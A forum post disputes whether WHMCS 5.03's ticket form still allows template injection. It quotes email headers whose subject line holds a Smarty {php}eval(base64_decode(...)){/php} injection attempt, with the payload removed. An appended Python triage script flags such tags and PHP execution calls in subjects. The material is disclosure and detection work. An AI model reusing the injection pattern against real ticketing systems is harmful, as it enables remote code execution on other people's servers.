Topic: WHMCS V5.03 Still allows injection into the subject line using submitticket.php

inetbiz

The Security patch for WHMCS V5.03 was released on 12-01-11 and can be read here
Quote
Originally Posted by Matt
I have responded to your support ticket about this. Once again there is nothing malicious about Smarty code being included in support tickets. The whole point is the variables are being sanitized otherwise you would have been hacked already. The code you are receiving poses no risk to your system, and trying to report it to sites as a security vulnerability is a silly thing to do - it is not. The vulnerability that existed was fixed 2 months ago.

If you have any further concerns, reply to the ticket and ask for my attention.

Matt
I did not see that the subject line code has been converted to html entities and still reject that the event that occurred was in fact abuse of the subject line.
Code:
X-MSK: FRND
Return-path: <nobody@xxx.xxx.com>
Envelope-to: xxx@xxxxxxx.com
Delivery-date: Mon, 09 Jan 2012 15:49:18 -0600
Received: from nobody by xxxxx.xxxxxxx-xxxxxx.com with local (Exim 4.69)
    (envelope-from <xxxxx@xxxxx.xxxxxx-xxxxxxx.com>)
    id 1RkN5i-0006OT-0h; Mon, 09 Jan 2012 15:49:18 -0600
To: ss <ss@ss.ss>
Subject: [Ticket ID: 222440] {php}eval(base64_decode('[payload removed]'));{/php}
X-PHP-Script: xxxxx.xxxxxx.com/submitticket.php for 31.13.208.48
Date: Mon, 9 Jan 2012 16:49:18 -0500
From: "xxxxxxxxInc. xxxxxx Sales" <sales@xxxx.xxxxx.com>
Message-ID: <9aa1b352deb371b08587738d92f18c7e@xxxxx.xxxxxx.com>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="b1_9aa1b352deb371b08587738d92f18c7e"

This is the resulting email after the web form was used to submit a ticket in the queue that does not require a client registration. Does anyone else want their subject line to be abused like this? It totally blows away your admin view ticket template.
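A triage check for ticket notifications like the one quoted above, added here as an example and not part of the original post or of WHMCS: it decodes the Subject header, flags Smarty code tags and PHP calls in it, and pulls the submitting script and client address from X-PHP-Script. The function name, the tag and call lists, and the sample message are assumptions made for illustration.

```python
import re
from email import message_from_string
from email.header import decode_header, make_header

# Smarty 2 tags that execute or pull in code, and PHP calls often wrapped in them.
SMARTY_TAG = re.compile(r"\{\s*/?\s*(include_php|php|include|eval|fetch)\b", re.I)
PHP_CALL = re.compile(r"\b(eval|base64_decode|system|passthru|shell_exec)\s*\(", re.I)
# Layout of the X-PHP-Script header in the post: "<host>/<script> for <client address>".
X_PHP_SCRIPT = re.compile(r"^(?P<script>\S+) for (?P<ip>[0-9A-Fa-f.:]+)")

def inspect_message(raw):
    """Return what a triage rule needs from one raw ticket notification."""
    msg = message_from_string(raw)
    # Decode RFC 2047 encoded-words first so an encoded subject cannot hide a tag.
    subject = str(make_header(decode_header(str(msg.get("Subject", "")))))
    tags = sorted({m.group(1).lower() for m in SMARTY_TAG.finditer(subject)})
    calls = sorted({m.group(1).lower() for m in PHP_CALL.finditer(subject)})
    origin = X_PHP_SCRIPT.match(str(msg.get("X-PHP-Script", "")))
    return {
        "subject": subject,
        "smarty_tags": tags,
        "php_calls": calls,
        "script": origin.group("script") if origin else None,
        "client_ip": origin.group("ip") if origin else None,
        "suspicious": bool(tags or calls),
    }

# Constructed sample modelled on the headers in the post; the host, address,
# ticket number and payload are placeholders.
SAMPLE = (
    "To: ss <ss@ss.ss>\n"
    "Subject: [Ticket ID: 100001] {php}eval(base64_decode('AAAA'));{/php}\n"
    "X-PHP-Script: billing.example.test/submitticket.php for 192.0.2.10\n"
    "X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)\n"
    "\n"
    "body\n"
)

if __name__ == "__main__":
    for key, value in inspect_message(SAMPLE).items():
        print(f"{key}: {value}")
```

Run it over messages pulled from the support mailbox or the MTA spool; a hit on `suspicious` together with `script` ending in `submitticket.php` identifies tickets submitted through the unauthenticated form.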